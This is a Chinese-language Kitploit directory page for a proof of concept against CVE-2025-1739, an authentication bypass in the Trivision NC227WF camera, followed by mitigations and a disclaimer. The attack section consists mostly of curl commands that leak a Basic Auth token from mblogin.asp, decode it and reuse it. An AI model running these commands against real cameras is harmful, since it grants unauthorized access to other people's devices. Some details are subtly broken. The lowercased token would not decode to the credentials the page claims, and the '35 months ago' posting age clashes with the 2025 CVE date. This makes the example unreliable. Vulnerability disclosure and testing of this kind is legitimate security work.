Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-1739 — CVE-2025-1739 的 0day PoC | Kitploit
工具/GitHubGitHub/n0n4m3x41/cve-2025-1739
身份验证与授权嵌入式系统安全物联网安全漏洞分析漏洞利用Web应用程序漏洞利用学习与教育
GitHubn0n4m3x41/cve-2025-1739

CVE-2025-1739

CVE-2025-1739 的 0day PoC

查看仓库
35个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-1738 与 CVE-2025-1739 — Trivision 摄像头 NC227WF PoC

📋 概述

CVECVSS v3.1评分CWE类型
CVE-2025-1739AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N7.1CWE-288通过 Basic Auth 泄露绕过身份验证

🔓 CVE-2025-1739 — Basic Auth 代码暴露 / 身份验证绕过 (CWE-288)

描述

摄像头通过 mblogin.asp 端点泄露了一个有效的 Base64 编码 Basic Authentication 令牌。此令牌可被轻易解码并重新利用,从而在无需知道密码的情况下获得对设备的未授权访问权限。

  • 攻击向量: 相邻网络 (AV:A)
  • CVSS 评分: 7.1
  • CWE: CWE-288 (使用替代路径或通道绕过身份验证)

载荷

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
图像

响应示例

响应中包含一个有效的 Basic Auth 令牌:

root@kitploit:~
ywrtaw46vw5ndwvzc2fibguxmjmh

解码令牌

root@kitploit:~
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Output: admin:unguessable123!

复用令牌

root@kitploit:~
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/

🛡️ 缓解措施

  • 升级固件:如果 Trivision 提供了已修补版本,请进行升级。
  • 隔离摄像头:将其置于无外部访问权限的专用 VLAN 中。
  • 配置防火墙:将摄像头的管理端口与不受信任的网络网段隔离开来。
  • 更改默认凭据并定期轮换密码。
  • 监控对 activex_pal.asp 和 mblogin.asp 的异常访问。

⚖️ 免责声明

本仓库仅用于教育和授权安全研究。作者对任何滥用行为不承担责任。在测试任何设备之前,请务必获得明确许可。

下载工具